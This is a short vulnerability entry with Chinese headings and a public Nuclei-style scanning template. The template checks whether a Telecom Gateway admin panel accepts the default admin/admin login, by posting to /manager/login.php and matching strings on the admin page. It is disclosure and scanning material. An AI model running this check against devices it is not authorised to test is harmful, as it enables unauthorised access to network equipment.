漏洞描述
Telecom Gateway default admin login credentials were successful.
telecom-gateway-default-login: Telecom Gateway - Default Admin Login
PoC代码[已公开]
id: telecom-gateway-default-login
info:
name: Telecom Gateway - Default Admin Login
author: ritikchaddha
severity: high
description: Telecom Gateway default admin login credentials were successful.
metadata:
max-request: 1
tags: default-login,telecom,gateway,vuln
http:
- raw:
- |
POST /manager/login.php HTTP/1.1
Host: {{Hostname}}
Name={{username}}&Pass={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>电信网关服务器管理后台</title>"
- "index-shang.php"
- "di.php"
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210080782655ba38730784d57708d13c57bbf254470dcd2e2704a43d13830a845fea02210096bccdad217b88adfbbe9d97c2d1e0f63bf24db39906a687f5733de57b33c9fc:922c64590222798bb761d5b6d8e72950